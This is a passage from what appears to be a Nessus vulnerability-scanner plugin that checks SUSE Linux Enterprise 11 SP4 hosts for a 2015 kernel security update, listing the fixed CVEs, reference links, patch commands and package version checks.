SLED11 / SLES11 Security Update : kernel-source (SUSE-SU-2015:1678-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-6252: Possible file descriptor leak for each\n VHOST_SET_LOG_FDcommand issued, this could eventually\n wasting available system resources and creating a denial\n of service (bsc#942367).\n\n - CVE-2015-5707: Possible integer overflow in the\n calculation of total number of pages in\n bio_map_user_iov() (bsc#940338).\n\n - CVE-2015-5364: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 do not\n properly consider yielding a processor, which allowed\n remote attackers to cause a denial of service (system\n hang) via incorrect checksums within a UDP packet flood\n (bsc#936831).\n\n - CVE-2015-5366: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 provide\n inappropriate -EAGAIN return values, which allowed\n remote attackers to cause a denial of service (EPOLLET\n epoll application read outage) via an incorrect checksum\n in a UDP packet, a different vulnerability than\n CVE-2015-5364 (bsc#936831).\n\n - CVE-2015-1420: Race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel through\n 3.19.1 allowed local users to bypass intended size\n restrictions and trigger read operations on additional\n memory locations by changing the handle_bytes value of a\n file handle during the execution of this function\n (bsc#915517).\n\n - CVE-2015-1805: The (1) pipe_read and (2) pipe_write\n implementations in fs/pipe.c in the Linux kernel before\n 3.16 do not properly consider the side effects of failed\n __copy_to_user_inatomic and __copy_from_user_inatomic\n calls, which allows local users to cause a denial of\n service (system crash) or possibly gain privileges via a\n crafted application, aka an 'I/O' vector array overrun.\n (bsc#933429)\n\n - CVE-2015-2150: Xen 3.3.x through 4.5.x and the Linux\n kernel through 3.19.1 do not properly restrict access to\n PCI command registers, which might allow local guest\n users to cause a denial of service (non-maskable\n interrupt and host crash) by disabling the (1) memory or\n (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported\n Request (UR) response. (bsc#919463)\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel before 3.19.2 does not prevent the TS_COMPAT flag\n from reaching a user-mode task, which might allow local\n users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1)\n fork or (2) close system call, as demonstrated by an\n attack against seccomp before 3.16. (bsc#926240)\n\n - CVE-2015-4700: The bpf_int_jit_compile function in\n arch/x86/net/bpf_jit_comp.c in the Linux kernel before\n 4.0.6 allowed local users to cause a denial of service\n (system crash) by creating a packet filter and then\n loading crafted BPF instructions that trigger late\n convergence by the JIT compiler (bsc#935705).\n\n - CVE-2015-4167: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.19.1 did not\n validate certain length values, which allowed local\n users to cause a denial of service (incorrect data\n representation or integer overflow, and OOPS) via a\n crafted UDF filesystem (bsc#933907).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c in\n linux-2.6.18-xen-3.4.0 (aka the Xen 3.4.x support\n patches for the Linux kernel 2.6.18), as used in the\n Linux kernel 2.6.x and 3.x in SUSE Linux distributions,\n allows guest OS users to obtain sensitive information\n from uninitialized locations in host OS kernel memory\n via unspecified vectors. (bsc#917830)\n\n - CVE-2014-9728: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not validate certain\n lengths, which allowed local users to cause a denial of\n service (buffer over-read and system crash) via a\n crafted filesystem image, related to fs/udf/inode.c and\n fs/udf/symlink.c (bsc#933904).\n\n - CVE-2014-9730: The udf_pc_to_char function in\n fs/udf/symlink.c in the Linux kernel before 3.18.2\n relies on component lengths that are unused, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9729: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.18.2 did not\n ensure a certain data-structure size consistency, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9731: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not ensure that space is\n available for storing a symlink target's name along with\n a trailing \\0 character, which allowed local users to\n obtain sensitive information via a crafted filesystem\n image, related to fs/udf/symlink.c and fs/udf/unicode.c\n (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=777565\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=873385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=883380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884333\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=891116\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920250\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929076\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931620\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935055\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935866\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942305\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942367\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9728/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9729/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9731/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0777/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2150/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4700/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5366/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5707/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6252/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151678-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ebdd7b0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-kernel-20150908-12114=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-trace-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-source-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-syms-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-source-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-syms-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-default-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-source-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-syms-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-trace-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", 